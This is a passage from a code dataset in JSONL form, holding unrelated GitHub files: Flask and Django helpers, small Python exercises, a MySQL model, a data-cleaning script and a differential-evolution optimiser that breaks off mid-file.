})","repo_name":"rgonzalezramos/django-webpack-react-template","sub_path":"django_reactjs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"71959742345","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python\n\nfrom flask import current_app, request\nfrom datetime import datetime\nfrom os import walk\nfrom werkzeug.utils import cached_property\nimport csv\nimport re\n\n\ntruly = lambda expr: expr is True\nfalsely = lambda expr: expr is False\nis_none = lambda expr: expr is None\nis_empty = lambda expr: expr == ''\nnone_or_empty = lambda obj: is_empty(obj) or is_none(obj)\n\n\nclass Archive(object):\n title = ''\n count = 0\n\n def __init__(self, **kwargs):\n self.__dict__.__init__(**kwargs)\n\n @property\n def posts(self):\n return [p for p in current_app.site.posts if (('%s-%s' % (p.published.year, p.published.month)) == self.title)]\n\n\ndef _extract_local(terms):\n if terms == '' or (terms is None):\n return ''\n\n results = re.match('^[a-z]{2}-[a-z]{2}', terms.lower())\n if results is not None:\n return results.group(0)\n else:\n ''\n\n\ndef fix_name(n):\n 'Fixes a string to be nicer (usable) variable names.'\n return n.replace(' ', '_').replace('.', '_')\n\n\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\n for row in csv_reader:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef read_csv(csv_file):\n from_csv_line = lambda l, h: dict(zip(h, l))\n iter = unicode_csv_reader(csv_file).__iter__()\n headers = map(fix_name, iter.next())\n return [from_csv_line(i, headers) for i in iter]\n\n\nclass Site(object):\n _data = None\n lang = ''\n\n def __init__(self, **kwargs):\n self.__dict__.__init__(**kwargs)\n\n def menus(self, search_path=''):\n \"\"\"Get all page in the site\n \"\"\"\n # patterns = search_path.split('/')\n # if len(patterns) == 1:\n _locale = _extract_local(search_path)\n if _locale is None:\n _locale = ''\n\n # current_app.logger.info(_locale)\n\n return sorted([sp for sp in [p for p in current_app.pages if p._has_title and p._top and p._locale == _locale]],\n key=lambda sp: sp._id)\n # else:\n # return self.query('/'.join(patterns[:1]))\n\n def get_pages_path(self, context_path=\"\"):\n if is_empty(context_path) or is_none(context_path):\n return current_app.pages.get('index')\n else:\n 
segments = context_path.split('/')\n _path = ''\n results = []\n\n for _partial in segments:\n if _path == '':\n _path = _partial\n else:\n _path = _path + '/' + _partial\n if _path != context_path:\n results.append(current_app.pages.get(_path))\n return results\n\n def locale_posts(self, locale=''):\n return (p for p in self.posts if p._locale == locale)\n\n def query(self, search_path, all=False, sort='id'):\n \"\"\"Get post in specified collation path\n \"\"\"\n posts = (p for p in current_app.pages if p._has_title and p.path.startswith(search_path) and p._is_not_post)\n if not all:\n posts = [p for p in posts if\n (len(p.path[len(search_path) + 1:].split('/')) == 1) and (p.path != search_path)]\n\n return sorted(posts, key=lambda p: p.meta.get(sort, 0))\n\n def tagged(self, tag, locale=''):\n return (p for p in current_app.pages if\n p._has_tags and p._has_title and (tag in p._tags) and p._locale == locale)\n\n @property\n def pages(self):\n \"\"\"Get all page in the site\n \"\"\"\n _pages = (p for p in current_app.pages if p._has_title and p._is_post == False)\n return sorted(_pages, key=lambda p: p._id)\n\n @property\n def posts(self):\n \"\"\" Get all posts in the site\n \"\"\"\n _posts = (p for p in current_app.pages if p._has_title and p._is_post)\n return sorted(_posts, reverse=True, key=lambda p: p.published)\n\n @cached_property\n def data(self):\n \"\"\" Auto load the data files (`/data` folder) into dict\n :return:\n \"\"\"\n from os import path\n import json\n import yaml\n import logging\n\n # if self._data is not None:\n # return self._data\n\n class FriendlyDict(dict):\n def __getattr__(self, item):\n return self.get(item, None)\n\n def __getitem__(self, name):\n return self.get(name, None)\n\n self._data = FriendlyDict()\n data_path = path.join(current_app.path, 'data')\n\n # Define data file loaders\n _yml_loader = lambda p, n, f: p.update({n: yaml.load(f.read())})\n _csv_loader = lambda p, n, f: p.update({n: read_csv(f)})\n\n _loaders_ = {\n '.json': lambda p, n, f: p.update({n: json.load(f)}),\n '.yml': _yml_loader,\n '.yaml': _yml_loader,\n '.csv': _csv_loader\n }\n\n logging.getLogger()\n\n def load_data_objects(parent, dst_path):\n for root, dirs, files in walk(dst_path):\n\n def __load_dirs__(d):\n parent.update({d: FriendlyDict()})\n load_data_objects(parent.get(d), path.join(root, d))\n\n def __load_files__(f):\n file_name = path.join(root, f)\n ext = path.splitext(file_name)[1]\n\n try:\n with open(file_name) as file:\n obj_name = path.basename(path.splitext(file_name)[0])\n (_loaders_.get(ext, None) is not None) and _loaders_.get(ext)(parent, obj_name, file)\n except Exception as e:\n logging.error(e.message)\n finally:\n pass\n\n [__load_dirs__(d) for d in dirs if parent.get(d) is None and root == dst_path]\n [__load_files__(f) for f in files if root == dst_path]\n\n load_data_objects(self._data, data_path)\n return self._data\n\n @property\n def tags(self):\n tag_strings = [p.meta.get('tags', '') for p in current_app.pages if p._has_tags]\n if is_none(tag_strings) or tag_strings == []:\n return []\n\n tags = (','.join(tag_strings)).split(',')\n tmp = []\n [(lambda c: (not (c in tmp)) and tmp.append(c))(tag) for tag in tags]\n return tmp\n\n @property\n def archives(self, locale=''):\n from itertools import groupby\n from operator import itemgetter\n\n _posts = [('%s-%s' % (p.published.year, p.published.month), p.path) for p in self.posts if\n (datetime.now() - p.published).days > 30 and p._locale == locale]\n\n _archives = []\n for key, val in 
groupby(sorted(_posts, reverse=True, key=itemgetter(0)), itemgetter(0)):\n archive = Archive(title=key, count=0)\n for i in val:\n archive.count += 1\n _archives.append(archive)\n\n return _archives","repo_name":"DotNetAge/freezes","sub_path":"freezes/sites.py","file_name":"sites.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"37530683034","text":"palavra = 'Carne'.upper(),'Sarna'.upper(),'Sarrar'.upper(),'Sorte'.upper(),'Peido'.upper()\nvogais = 'A', 'E', 'I', 'O', 'U'\n\nfor pos , c in enumerate(palavra):\n print(f'{c} vogais são: ', end='')\n for d in range(0,len(c)):\n if c[d] in vogais:\n print(f'{c[d]}',end='')\n print('')\n\n\n","repo_name":"Natanael-Marlon/Python3_Curso_em_Video","sub_path":"ex077.py","file_name":"ex077.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27750779324","text":"from synchrony import log, db\nfrom synchrony.models import UserGroup, Priv, Acl\n\ndef init_user_groups():\n \"\"\"\n Administrators:\n see_all\n delete_at_will\n reset_user_pw\n modify_user\n modify_usergroup\n deactivate\n manage_networks\n review_downloads\n toggle_signups\n Users:\n chat\n initiate_rtc\n create_revision\n retrieve_from_dht\n browse_peer_nodes\n retrieve_resource\n stream_document\n\n There's also a secret privilege called \"eval\" that we don't create but is\n checked for in streams.chat.on_cmd. Perhaps make a special UserGroup for\n yourself.\n \"\"\"\n # Bans happen by setting User.active to False and clearing their existing sessions.\n groups = [\"Administrators\", \"Users\"]\n admin_privs = [ \"see_all\", \"delete_at_will\", \"reset_user_pw\", \"modify_user\",\n \"modify_usergroup\", \"deactivate\", \"manage_networks\",\n \"review_downloads\", \"toggle_signups\"] \n privs = [ \"create_revision_group\", \"delete_revision_group\", \"chat\",\n \"initiate_rtc\", \"create_revision\", \"retrieve_from_dht\", \n \"browse_peer_nodes\", \"retrieve_resource\", \"stream_document\"]\n\n privs.extend(admin_privs)\n\n if not Priv.query.first():\n log(\"Creating privileges.\")\n\n for priv in privs:\n p = Priv.query.filter(Priv.name == priv).first()\n if not p:\n p = Priv(name=priv)\n db.session.add(p)\n db.session.commit()\n\n for group in groups:\n g = UserGroup.query.filter(UserGroup.name == group).first()\n if not g:\n g = UserGroup(name=group)\n for p in Priv.query.all():\n if group != \"Administrators\" and p.name in admin_privs:\n continue\n a = Acl()\n a.group = g\n a.priv = p\n a.allowed = True\n db.session.add(a)\n db.session.add(p)\n db.session.commit()\n db.session.add(g)\n db.session.commit()\n log(\"Created user group \\\"%s\\\".\" % group)\n\ndef ban(user):\n pass\n\ndef unban(user):\n pass\n","repo_name":"Psybernetics/Synchrony","sub_path":"synchrony/controllers/usergroups.py","file_name":"usergroups.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"74009546826","text":"\"\"\"\nThe Ultimate Wacky Recipe Maker\n\nWe have learned enough skills for a simple, but cool, project!\n\nRemember when you were a kid and thought the ideal dinner \nwould just be all your favorite things mixed in a bowl? How did that Nutella Mac & Cheese taste? 
Well - let's come up with a recipe generator to build us an amazing dish for today's evening meal!\n\"\"\"\nfoodType = \"chinese food\"\nplantType = \"daisy\"\ncookingMethod = \"steamed\"\ndesc = \"denied\"\nitem = \"fork\"\n\nprint(\"Menu \\n Today we have some\", cookingMethod, \"\\n\", \n foodType, \" that is served \\n with a\", plantType, \" and\", \n item, \".\\n Our food is never\", desc, \"!\")\n","repo_name":"AlfonsoTorrez/PythonLearning","sub_path":"python03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41755666974","text":"import glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport itertools\nimport pickle\nimport sys\nimport time\nsys.path.append(\"..\")\nfrom demo_2_awac import och_2_awac\ndata_dirs = ['/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetrelabeled_MCS3.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetrelabeled_MCS2.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetlabeled_MCS1.pkl',\n '/usr/local/google/home/abhishekunique/sim_franka/rpl_reset_free/recordings/play_targetlabeled_MCS0.pkl',]\n\no_size = 13\nall_demos = []\nadjacency_matrix = np.zeros((8,8))\nlabeled_goals = [[] for _ in range(8)]\nlabeled_demos = [[] for _ in range(8)]\n\nfor di, data_dir in enumerate(data_dirs):\n demos = pickle.load(open(data_dir, 'rb'))\n demos = och_2_awac(demos)\n\n segment_idxs = []\n\n range_objs = [0.1, 0.1, 0.05, 0.05]\n for demo in demos:\n max_objs = np.array([0.25, 1, 0.75, -0.05])\n min_objs = np.array([0.1, 0.1, 0.15, -0.2])\n curr_segment_idx = []\n init_pos = demo['observations'][0, 2:6]\n init_bitflip = np.array([0, 0, 0, 1])\n for j in range(4):\n if init_pos[j] > max_objs[j]:\n init_bitflip[j] = 1\n elif init_pos[j] < min_objs[j]:\n init_bitflip[j] = 0\n final_pos = demo['observations'][-1, 2:6]\n final_bitflip = init_bitflip.copy()\n for j in range(4):\n if final_pos[j] > max_objs[j]:\n final_bitflip[j] = 1\n elif final_pos[j] < min_objs[j]:\n final_bitflip[j] = 0\n\n old_idx = 4*init_bitflip[0] + 2*init_bitflip[2] + init_bitflip[3]\n new_idx = 4 * final_bitflip[0] + 2 * final_bitflip[2] + final_bitflip[3]\n labeled_goals[int(new_idx)].append(demo['observations'][-1, :13])\n adjacency_matrix[int(old_idx), int(new_idx)] += 1\n\n goal = demo['observations'][-1, :o_size].copy()\n demo['observations'][:, o_size:] = goal.copy()\n demo['next_observations'][:, o_size:] = goal.copy()\n all_demos.append(demo)\n labeled_demos[int(old_idx)].append(demo)\n\n\n # import gym\n # import adept_envs\n # env = gym.make(\"franka_microwave_cabinet_slider-v1\")\n # for demo in demos:\n # qp_reset = demo['observations'][-1]\n # mocap_reset = demo['observations'][-1, 6:9]\n # env.sim.data.qpos[7:9] = qp_reset[:2].copy()\n # env.sim.data.qpos[9:13] = qp_reset[2:6].copy()\n # env.sim.data.mocap_pos[:] = mocap_reset.copy()\n # for _ in range(100):\n # env.sim.step()\n # env.render()\n # time.sleep(2)\n\n# plt.imshow(adjacency_matrix)\n# locs, labels = plt.xticks()\n# label_list = itertools.product(['SC', 'SO'], ['CC','CO'], ['MO', 'MC'])\n# label_list = ['-'.join(s) for s in label_list]\n# plt.yticks(np.arange(8), label_list)\n# plt.xticks(np.arange(8), label_list, rotation=90)\n# plt.show()\nfor i in range(8):\n pickle.dump(labeled_demos[i], 
open('segmentedcollectedplay_microwave_cabinent_slider_perstart_%d.pkl'%i, 'wb'))\npickle.dump(all_demos, open('segmentedcollectedplay_microwave_cabinent_slider.pkl', 'wb'))","repo_name":"google-research/DBAP-algorithm","sub_path":"third_party/rlkit_library/scripts/dump_adjacency_goals.py","file_name":"dump_adjacency_goals.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"7131281037","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\n\n\n\n\n\nclass Ninja:\n DB = 'dojos_and_ninjas_schma'\n\n def __init__(self, data):\n self.id = data['id']\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.age = data['age']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.dojo_id = data['dojo_id']\n\n\n @classmethod\n def get_all(cls, data):\n query = \"\"\"SELECT * FROM ninjas\n WHERE dojo_id = %(id)s ;\"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n ninjas = []\n for ninja in results:\n ninjas.append( cls(ninja) )\n return ninjas\n\n\n\n @classmethod\n def add_ninja(cls, data):\n query = \"\"\"\n INSERT INTO ninjas (first_name, last_name, age, dojo_id)\n VALUES ( %(first_name)s, %(last_name)s, %(age)s, %(dojo_id)s );\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n \n\n @classmethod\n def get_one(cls,data):\n query = \"\"\"\n SELECT * FROM ninjas\n WHERE id = %(id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return cls(results[0])\n\n\n @classmethod\n def update_ninja(cls,data):\n query = \"\"\"\n UPDATE ninjas\n SET first_name = %(first_name)s, last_name = %(last_name)s, age = %(age)s, dojo_id = %(dojo_id)s \n WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n\n\n @classmethod\n def delete_ninja(cls,data):\n query = \"\"\"\n DELETE FROM ninjas WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return results\n\n\n @classmethod\n def ninja_data(cls,data):\n query = \"\"\"\n SELECT * FROM ninjas\n WHERE id = %(ninja_id)s ;\n \"\"\"\n results = connectToMySQL(cls.DB).query_db(query, data)\n return cls (results[0])\n\n","repo_name":"AlekseyKashubin/dojos_and_ninjas","sub_path":"flask_app/models/ninja_model.py","file_name":"ninja_model.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"855874098","text":"#!/usr/bin/python3\n\"\"\"Defines a function to divide matrix elements\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\" Function that divides the integer/float numbers of a matrix\n Args:\n matrix: list of a lists of integers/floats\n div: number to divide by\n Raises:\n TypeError: If the matrix contains non-numbers\n If the matrix contains rows of different sizes\n If div is not an int or float.\n ZeroDivisionError: If div is zero\n Returns:\n A new matrix with the result of the division\n \"\"\"\n\n matlength = 0\n\n if not isinstance(div, (int, float)):\n raise TypeError(\"div must be a number\")\n\n err = \"matrix must be a matrix (list of lists) of integers/floats\"\n\n if not matrix or not isinstance(matrix, list):\n raise TypeError(err)\n\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n\n if not matrix or not isinstance(matrix, list):\n raise TypeError(err)\n\n for value in matrix:\n if not value or not 
isinstance(value, list):\n raise TypeError(err)\n\n if matlength != 0 and len(value) != matlength:\n raise TypeError(\"Each row of the matrix must have the same size\")\n\n for num in value:\n if not isinstance(num, (int, float)):\n raise TypeError(err)\n\n matlength = len(value)\n\n s = list(map(lambda x: list(map(lambda y: round(y / div, 2), x)), matrix))\n return (s)\n","repo_name":"franklinetush1/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28927237374","text":"import sys\r\n\r\ndataFile = open('WBC.data', 'r').read()\r\ndataDic = {i.split(',')[0]: i.split(',')[1:] for i in dataFile.split('\\n')}\r\n\r\ndef funDataClean():\r\n\r\n global dataDic\r\n\r\n missingValues = []\r\n\r\n for key, val in dataDic.items():\r\n for j in range(len(val)):\r\n if val[j] == '?':\r\n val[j] = calcMissing(j, val[9])\r\n missingValues.append(val[j])\r\n dataDic[key] = val\r\n\r\n return sum(missingValues) / len(missingValues)\r\n\r\n\r\ndef calcMissing(index, category):\r\n indexSum = []\r\n\r\n for key, val in dataDic.items():\r\n for k in range(len(val) - 1):\r\n if val[index] != '?' and val[9] == category:\r\n indexSum.append(int(val[index]))\r\n\r\n return round(sum(indexSum) / len(indexSum))\r\n\r\ndef performStepWiseSearch(args):\r\n global dataDic\r\n\r\n argl = args.split(',')\r\n for i in range(len(argl)):\r\n if argl[i] == '?':\r\n continue\r\n else:\r\n argt = argl[i].split(':')\r\n c = int(argt[1])\r\n if argt[0] == '<':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) < c})\r\n if argt[0] == '<=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) <= c})\r\n if argt[0] == '>':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) > c})\r\n if argt[0] == '>=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) >= c})\r\n if argt[0] == '!=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) != c})\r\n if argt[0] == '=':\r\n dataDic = dict({k: v for k, v in dataDic.items() if int(v[i]) == c})\r\n\r\nprint('The average of all missing values is : ' + '{0:.4f}'.format(funDataClean()))\r\n\r\nperformStepWiseSearch(sys.argv[1])\r\n\r\ncaseMalignant = len(dict({k: v for k, v in dataDic.items() if v[9] == 'malignant'}))\r\ncaseBenign = len(dict({k: v for k, v in dataDic.items() if v[9] == 'benign'}))\r\n\r\nprint('\\nTest Results:\\n'\r\n '----------------------------------------------'\r\n '\\nPositive (malignant) cases : ' + str(caseMalignant) +\r\n '\\nNegative (benign) cases : ' + str(caseBenign) +\r\n '\\nThe probability of being positive : ' + '{0:.4f}'.format(caseMalignant / len(dataDic)) +\r\n '\\n----------------------------------------------')\r\n","repo_name":"b21627868/drafts","sub_path":"malignant benign mehmet abi.py","file_name":"malignant benign mehmet abi.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4980149730","text":"import os\nimport django\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','covid19.settings')\ndjango.setup()\n\nfrom pandas import read_json, read_csv\nfrom datetime import date\nfrom numpy import inf, nan\nfrom time import ctime, time\nfrom report.models import Country, WeekReport\n\ndef report(df,region_dict,label_dict):\n '''\n This function will 
manipulate the country_report.json file in order to obtain\n the dataframe with the columns representing the models.WeekReport attributes\n\n region_dict and label_dict are dictionaries necessary for data transformation\n '''\n\n df_aux = df.copy()[['Country/Region','Date']]\n df_aux['Country/Region'] = df_aux['Country/Region'].transform(lambda x: label_dict[x] if x in label_dict.keys() else x)\n df_aux['week'] = df_aux['Date'].transform(lambda x:date(x.year, x.month, x.day).strftime('%Y-%U'))\n\n column_names = ['Confirmed','Deaths']\n for column in column_names:\n df_aux[column] = df[column + '_new_cases']\n\n df_aux = df_aux.groupby(['Country/Region','week']).sum().reset_index()\n for column in column_names:\n df_aux[column] = df_aux[column].transform(lambda x:max(x,0))\n\n df_aux['region'] = df_aux['Country/Region'].transform(lambda x: region_dict[x] if x in region_dict.keys() else x)\n\n for column in column_names:\n df_aux[column + '_pct_change'] = df_aux.groupby('Country/Region')[column].pct_change()*100\n df_aux[column + '_pct_change'].replace(to_replace=[-inf, inf],value=nan,inplace=True)\n df_aux[column + '_pct_change'].fillna(value=0,inplace=True)\n\n df_aux[column + '_rank_world'] = df_aux.groupby('week')[column].rank(method='min',ascending=False)\n df_aux[column + '_rank_region'] = df_aux.groupby(['week','region'])[column].rank(method='min',ascending=False)\n\n df_aux['last_update'] = df['Date'].max()\n df_aux['last_update'] = df_aux['last_update'].transform(lambda x:date(x.year,x.month,x.day))\n\n return df_aux\n\n\ndef update_db(df,modeldb):\n # Updating selected objects attributes:\n for obj in modeldb:\n param = df.loc[df['Country/Region'] == obj.country.name]\n\n obj.week=param.week.values[0]\n obj.confirmed=int(param.Confirmed.values[0])\n obj.confirmed_pct_change=float(param.Confirmed_pct_change.values[0])\n obj.confirmed_rank_region=int(param.Confirmed_rank_region.values[0])\n obj.confirmed_rank_world=int(param.Confirmed_rank_world.values[0])\n obj.deaths=int(param.Deaths.values[0])\n obj.deaths_pct_change=float(param.Deaths_pct_change.values[0])\n obj.deaths_rank_region=int(param.Deaths_rank_region.values[0])\n obj.deaths_rank_world=int(param.Deaths_rank_world.values[0])\n obj.last_update=param.last_update.values[0]\n\n obj.save()\n print('{} updated in database'.format(obj.country.name))\n\n\ndef insert_db(df,countries_list):\n print('Inserting all countries in the list to models.WeekReport')\n\n for item in countries_list:\n country = Country.objects.filter(name=item)\n\n if country.exists():\n df_info = df.loc[df['Country/Region']==item]\n for i in df_info.index:\n param = df_info.loc[i]\n entry = WeekReport.objects.get_or_create(country=country[0],\n week=param.week,\n confirmed=param.Confirmed,\n confirmed_pct_change=param.Confirmed_pct_change,\n confirmed_rank_region=int(param.Confirmed_rank_region),\n confirmed_rank_world=int(param.Confirmed_rank_world),\n deaths=param.Deaths,\n deaths_pct_change=param.Deaths_pct_change,\n deaths_rank_region=int(param.Deaths_rank_region),\n deaths_rank_world=int(param.Deaths_rank_world),\n last_update=param.last_update)[0]\n\n entry.save()\n print('{} inserted into models.WeekReport'.format(item))\n else:\n print(item + ' is not on Country.models')\n\n\ndef main():\n def db_del(database,confirm_before=True):\n # This function delete all entries in \"database\" model\n\n flag = True\n\n if confirm_before:\n confirm_delete = input('This will erase all entries in models.WeekReport. 
Press \"n\" if you wish to skip delete or any other key to continue: ')\n\n if confirm_delete == 'n':\n flag = False\n else:\n pass\n\n if flag:\n database.objects.all().delete()\n print('All entries in models.{} deleted succesfully!'.format(database))\n else:\n print('No modifications on database.')\n pass\n\n try:\n # In the config.csv file, on 'countryinfo_file' row of columns 'var':\n # - aux1: Set 0, for delete all entries in database or 1 for add/update entries;\n # - aux2: Set 0, for reload database from 'country_report.json' file or 1 for update existing entries;\n # - aux3: Set 1, for confirmation need in case aux1 is set to 0;\n\n log_dbWeekReport=[]\n log_dbWeekReport.append('\\n----------dbWeekReport.py SCRIPT EXECUTION REPORT-----------\\n')\n log_dbWeekReport.append('\\n'+ 'Local time: ' + ctime() + '\\n\\n')\n\n task = config.loc['week_report'].aux1\n update = config.loc['week_report'].aux2\n confirm_value=config.loc['week_report'].aux3\n\n if not task: # This will delete the entire WeekReport database\n db_del(WeekReport,confirm_before=confirm_value)\n\n else: # This will update or create the WeekReport database\n\n # ---------------------------\n # Reading Configuration files\n country_report = os.path.join(config.loc['week_report'].file_path,\n config.loc['week_report'].file_name)\n\n country_table_file = os.path.join(config.loc['countryinfo_file'].file_path,\n config.loc['countryinfo_file'].file_name)\n\n label_map_file = os.path.join(config.loc['labelmap_file'].file_path,\n config.loc['labelmap_file'].file_name)\n\n countries_table = read_csv(country_table_file,index_col='Country')\n\n #--------------------- ---------------------------\n # reading region dictionary and labels dictionary:\n region_dict = countries_table['Region'].to_dict()\n label_dict = read_csv(label_map_file,header=None,index_col=0).to_dict()[1]\n\n # -----------------------------------\n # Creating the week_report dataframe\n print(\"Reading 'country_report.json' file\")\n df = read_json(country_report)\n\n print(\"Creating week report table\")\n\n week_report = report(df,region_dict,label_dict)\n countries_list = week_report['Country/Region'].unique()\n\n print(\"week_report table generated succesfully!\")\n\n # =================================================================\n\n if update:\n start_time = time() # Let's check the execution time of the database update\n\n # =================================================================\n # Now, let's compare the latest week in table with the latest week\n # in database. If they are the same, update is enabled. 
Otherwise, a\n # database insert query is called:\n\n db_last_week = WeekReport.objects.order_by('-week')[0].week\n\n x = week_report.last_update.max()\n report_last_week = date(x.year, x.month, x.day).strftime('%Y-%U')\n\n if db_last_week == report_last_week:\n flag_update = 'update'\n else:\n year_in_report = int(report_last_week[:4])\n year_in_db = int(db_last_week[:4])\n\n week_in_report = int(report_last_week[-2:])\n week_in_db = int(db_last_week[-2:])\n\n if year_in_report < year_in_db:\n flag_update = 'ahead'\n else:\n if week_in_report > week_in_db:\n flag_update = 'insert'\n else:\n flag_update = 'ahead'\n\n print('updating all entries in models.WeekReport')\n\n # Once update is enabled, the week_report dataframe will be filtered\n # to the last 'year-week' and the objects in database will be filtered\n # to those in the same year-week in order to save memory resources:\n if flag_update == 'update':\n df = week_report.loc[week_report['week']==db_last_week]\n modeldb = WeekReport.objects.filter(week=db_last_week)\n\n update_db(df,modeldb)\n elif flag_update == 'insert':\n # In case there's a difference between weeks or years between\n # the report and the database, first we update the last week\n # in the database and then we insert the other weeks new objects\n\n # 1 - Update last week in database:\n df = week_report.loc[week_report['week']==db_last_week]\n modeldb = WeekReport.objects.filter(week=db_last_week)\n\n update_db(df,modeldb)\n\n # 2 - Insert new week(s) in database:\n df = week_report.loc[week_report['week'] > db_last_week]\n insert_db(df,countries_list)\n else:\n log_dbWeekReport.append('\\n models.WeekReport is ahead of report. No action taken. \\n')\n pass\n\n log_dbWeekReport.append('\\n models.WeekReport updated succesfully \\n')\n log_dbWeekReport.append('\\n database update execution time: {:.2f}sec \\n'.format(time()-start_time))\n else:\n start_time = time()\n\n db_del(WeekReport,confirm_before=confirm_value)\n insert_db(week_report,countries_list)\n\n log_dbWeekReport.append('\\n models.WeekReport populated succesfully \\n')\n log_dbWeekReport.append('\\n database creation execution time: {:.2f}sec \\n'.format(time()-start_time))\n\n message = 'Script executed succesfully!'\n print(message)\n log_dbWeekReport.append('\\n Most recent week on report: {} \\n'.format(WeekReport.objects.order_by('-week')[0].week))\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n except:\n message = 'Something went wrong! 
The script was not executed'\n print(message)\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n finally:\n message = 'End of execution of the dbWeekReport.py script'\n print(message)\n log_dbWeekReport.append('\\n {} \\n'.format(message))\n\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','w')\n log.writelines(log_dbWeekReport)\n log.close()\n\n\n\nif __name__ == '__main__':\n script_start_time = time()\n\n config_filepath = r\"C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\config\"\n log_dir = r'C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\log'\n\n if 'config.csv' in os.listdir(config_filepath):\n print('Reading configuration file')\n config = read_csv(os.path.join(config_filepath,'config.csv'),index_col='var').fillna('-')\n else:\n raise FileNotFoundError('No configuration file \"config.csv\" found.')\n\n country_report = os.path.join(config.loc['week_report'].file_path,\n config.loc['week_report'].file_name)\n\n last_modified = config.loc['week_report'].aux4\n current_date = ctime(os.path.getmtime(country_report))\n\n if current_date == last_modified and False:\n log_dbWeekReport=[]\n log_dbWeekReport.append('\\n----------dbWeekReport.py SCRIPT EXECUTION REPORT-----------\\n')\n log_dbWeekReport.append('\\n'+ 'Local time: ' + ctime() + '\\n\\n')\n log_dbWeekReport.append('\\n --> current file has not been modified. Nothing to do here.')\n\n log_dir = r'C:\\Users\\user\\Documents\\GitHub\\django\\covid19\\static\\report\\log'\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','w')\n log.writelines(log_dbWeekReport)\n log.close()\n\n print('No necessary actions for the current file')\n pass\n else:\n main()\n\n os.chdir(config_filepath)\n config.loc['week_report','aux4'] = current_date\n config.to_csv('config.csv')\n\n os.chdir(log_dir)\n\n log = open('log_dbWeekReport.txt','a')\n log.writelines('\\n Script execution time: {:.2f}sec \\n'.format(time() - script_start_time))\n log.close()\n","repo_name":"psychopresley/django","sub_path":"covid19/report/Backup_templates/Ongoing/dbWeekReport.py","file_name":"dbWeekReport.py","file_ext":"py","file_size_in_byte":13260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19994314799","text":"import math\nimport random\n\nimport numpy as np\n\nfrom ..algorithm_common import AlgorithmCommon as AC\nfrom ..algorithm_common import IAlgorithm\n\n\nclass DE(IAlgorithm):\n def __init__(self,\n agent_max,\n crossover_rate=0.5,\n scaling=0.5,\n ):\n self.agent_max = agent_max\n self.crossover_rate = crossover_rate\n self.scaling = scaling\n\n def init(self, problem):\n self.problem = problem\n self.count = 0\n\n self.agents = []\n for _ in range(self.agent_max):\n self.agents.append(problem.create())\n\n def getMaxElement(self):\n self.agents.sort(key=lambda x: x.getScore())\n return self.agents[-1]\n\n def getElements(self):\n return self.agents\n \n def step(self):\n\n for i, agent in enumerate(self.agents):\n\n # iを含まない3個体をランダムに選択\n r1, r2, r3 = random.sample([ j for j in range(len(self.agents)) if j != i ], 3)\n pos1 = self.agents[r1].getArray()\n pos2 = self.agents[r2].getArray()\n pos3 = self.agents[r3].getArray()\n\n # 3個体から変異ベクトルをだす\n m_pos = pos1 + self.scaling * (pos2 - pos3)\n\n # 変異ベクトルで交叉させる(一様交叉)\n pos = agent.getArray()\n ri = random.randint(0, len(pos)) # 1成分は必ず変異ベクトル\n for j in range(len(pos)):\n if ri == 